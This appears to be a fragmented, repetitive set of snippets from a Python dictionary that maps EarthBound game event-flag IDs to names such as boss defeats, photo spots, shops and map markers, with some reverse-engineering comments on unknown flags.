67: 'FOOD_STAND_MONITOR_DEFEATED',", "'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE',", "64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED',", "'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED',", "745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five Tour Bus???)", "'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749:", "160 (???) # 161 (???) # 162 (???) # 163 (???) # 164", "356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362:", "# 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP',", "# 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED',", "633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639:", "70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76:", "'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU',", "'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR',", "'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB',", "# 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you", "you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN',", "mine?) # 55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57:", "# 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC',", "'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE',", "116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122:", "'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT',", "defeated. One of them might be responsible only for palette changes, maybe) 435:", "'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED',", "282 (Five moles defeated? How does this differ from 72?) # 283 (???)", "507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513:", "477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483:", "# 779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save", "'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313", "'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???)", "130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136:", "653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659:", "348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354:", "'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS',", "room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304:", "'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM',", "463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related", "'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive the Pencil Eraser.", "'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC',", "flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4',", "249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255:", "805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834:", "4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10:", "to start?) # 680 (Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP',", "'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP',", "'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', #", "720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726:", "'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"?", "cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766:", "'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about Paula's Dad acknowledging the kidnapping)", "428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC',", "'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???)", "'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER',", "'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE',", "276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', #", "301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306:", "473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death. TODO: Investigate)", "'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE',", "'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them", "'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS',", "'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED',", "'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN',", "'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY',", "2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8:", "372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT',", "539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC',", "298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', #", "never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this", "776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780", "'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and not", "for someone in Threed?) # 589 (Visibility flag for some Hotel Attendant?) 590:", "Visibility flags for NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get", "# 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161", "247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253:", "'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341:", "'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED',", "'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED',", "'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related", "'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT',", "712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718:", "'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE',", "83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89:", "500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506:", "'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second", "about the Gourmet Yogurt Machine) # 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT',", "at beginning of expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??)", "flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED',", "'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS',", "'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2',", "Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE',", "'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and", "177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183:", "'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5',", "hate multipurpose flags) # 227 (I hate multipurpose flags) # 228 (I hate", "775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', #", "(I hate multipurpose flags) # 231 (I hate multipurpose flags) # 232 (I", "107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID',", "knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY',", "759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', #", "#852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared when", "555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561:", "229 (I hate multipurpose flags) # 230 (I hate multipurpose flags) # 231", "'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', #", "out of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628:", "16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351:", "'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK',", "495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501:", "same flag IDs FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4:", "(Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE',", "17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23:", "713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719:", "'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM',", "This flag is set even if you don't talk to Apple Kid 127:", "reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph", "732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738:", "119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125:", "(Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE',", "'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP',", "370 (Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373", "227 (I hate multipurpose flags) # 228 (I hate multipurpose flags) # 229", "(Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP',", "'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 